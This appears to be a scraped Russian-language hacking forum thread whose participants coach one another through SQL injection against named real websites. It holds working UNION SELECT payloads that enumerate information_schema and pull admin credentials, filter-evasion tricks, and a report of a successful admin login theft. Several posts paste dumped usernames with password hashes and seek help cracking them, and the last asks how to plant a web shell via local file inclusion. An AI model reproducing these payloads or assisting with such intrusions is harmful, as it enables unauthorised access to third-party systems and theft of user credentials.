2 Adm1n4eG try http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--
Тогда уж лимит+17,1 Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html Читай там вопрос номер 3.
Тебе же сказали: 1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+admin-- - подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица 2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+information_schema.columns+where+table_name=0x61646d696e - узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin 3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй 4. Просто нет прав на чтение данной таблицы у текущего юзера
Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка... R1dex большое спасибо!!! эт я както упустил ))) все таки оказалось что таблица находится не в той базе с которой работает скрип проверил это таким образом: Запрос выдал: bwbvdisk Итоговый запрос и получение админского логина и пасса: Всем кто помогал спс!
ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и пробуй select user from mysql.user limit 9999999
смотря какая фильтрация - есть грамотная, и ничего сделать нельзя, а есть дурацкая, и тогда можно всё. Мало инфы выдаешь - столько тусить УЖЕ на ачаде и так тупить, есть ли ошибки, выводящиеся на экран, нет их, и etc. Выдавай сразу МНОГО, ОЧЕНЬ МНОГО, ПО МАКСИМУМУ инфы, не заставляй флудить, ибо ведет такое общение к полному игнору ЗЫЖ Надо же, успел отпостить)) Вот по результатам выводимых ошибок и ориентируйся - SELECT FROM, SElecT FrOM, selSELECTect FrFRomOM и etc. Пробуй в общем
select from насколько я помню это древняя защита sweb-хостинга Отправляй данные не Гетом, а Постом https://forum.antichat.ru/showthread.php?t=56409
выудил из бд... но я не знаю что здесь за хеш, кто может мне помочь, буду очень благодарен smomanyi:a750e0be90a80128d99c46278e3c2af47fa83a16272fe77e8596da00d34fdda9 jmgutu:1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032
Не надо ничего искать и сравнивать, всё уже сделано до нас: http://bug-track.ru/prog/encoder1.0.rar - вставить хеш и посмотреть вниз
Вопрос по скуле. Имеем: http://stat.vbios.com/bf2/?rid=19708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- 1 http://stat.vbios.com/bf2/?rid=19708+order+by+16 -- 1 Чтоже не правильно то,пишет все время что колумнов не правильно подобрал я Tables: kills, maps
хз короче, но вот это: Code: http://stat.vbios.com/bf2/?rid=19708+or+1=1+and+substring(version(),1,1)=5 отличается от всего остального
Слышал что в ллокальном инклуде можно залить шелл удалённо. Это действительно так? и каким способом? подскажите плиз.
